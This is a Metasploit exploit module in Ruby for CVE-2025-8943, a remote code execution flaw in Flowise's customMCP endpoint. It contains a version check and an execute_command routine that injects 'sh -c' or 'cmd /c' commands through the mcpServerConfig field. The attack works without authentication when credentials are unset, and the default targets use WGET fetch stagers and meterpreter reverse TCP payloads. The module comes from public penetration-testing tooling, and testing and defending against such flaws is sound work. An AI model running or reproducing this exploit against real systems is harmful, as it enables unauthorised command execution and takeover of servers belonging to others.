## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HTTP::Flowise prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Flowise Custom MCP Remote Code Execution', 'Description' => %q{ This module exploits a remote code execution vulnerability in Flowise versions >= 2.2.7-patch.1 and < 3.0.1. The vulnerability exists in the customMCP endpoint (/api/v1/node-load-method/customMCP) located in packages/components/nodes/tools/MCP/CustomMCP/CustomMCP.ts and packages/components/nodes/tools/MCP/core.ts, which allows users to execute arbitrary commands via StdioClientTransport by using the 'x-request-from: internal' header. When FLOWISE_USERNAME and FLOWISE_PASSWORD are not configured, the exploit works unauthenticated. If Basic Auth is enabled, the FLOWISE_USERNAME and FLOWISE_PASSWORD options must be set to provide credentials. }, 'Author' => [ 'Assaf Levkovich', # Vulnerability discovery (JFrog) 'Valentin Lobstein ' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2025-8943'], ['URL', 'https://research.jfrog.com/vulnerabilities/flowise-os-command-remote-code-execution-jfsa-2025-001380578/'] ], 'Targets' => [ [ 'Unix/Linux Command', { 'Platform' => %w[unix linux], 'Arch' => ARCH_CMD, 'DefaultOptions' => { 'FETCH_COMMAND' => 'WGET' } # tested with cmd/linux/http/x64/meterpreter_reverse_tcp } ], [ 'Windows Command', { 'Platform' => 'win', 'Arch' => ARCH_CMD # tested with cmd/windows/http/x64/meterpreter_reverse_tcp } ] ], 'Privileged' => false, 'DisclosureDate' => '2025-08-14', 'DefaultTarget' => 0, 'DefaultOptions' => { 'RPORT' => 3000 }, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS] } ) ) register_options([ OptString.new('FLOWISE_USERNAME', [false, 'Flowise username for Basic Auth (required if env var is set)', '']), OptString.new('FLOWISE_PASSWORD', [false, 'Flowise password for Basic Auth (required if env var is set)', '']) ]) end def check version = flowise_get_version return CheckCode::Unknown('Could not retrieve Flowise version') unless version print_status("Flowise version detected: #{version}") # Vulnerability introduced in 2.2.7-patch.1 (March 14, 2025) and fixed in 3.0.1 (May 29, 2025) # Note: Rex::Version parses "2.2.7-patch.1" as "2.2.7.pre.patch.1", so we check >= 2.2.7 if (version >= Rex::Version.new('2.2.7') || version.to_s.include?('2.2.7')) && version < Rex::Version.new('3.0.1') return CheckCode::Appears('(affected: >= 2.2.7-patch.1 and < 3.0.1)') end CheckCode::Safe("Version #{version} is not vulnerable") end def execute_command(cmd, _opts = {}) command = 'sh' args = ['-c', cmd] if target.platform.names.include?('Windows') command = 'cmd' args = ['/c', cmd] end payload_data = { 'inputs' => { 'mcpServerConfig' => { 'command' => command, 'args' => args } }, 'loadMethod' => 'listActions' } opts = { username: datastore['FLOWISE_USERNAME'], password: datastore['FLOWISE_PASSWORD'] } flowise_send_custommcp_request(payload_data, opts) end def exploit fail_with(Failure::PayloadFailed, 'Failed to run payload') unless execute_command(payload.encoded) end end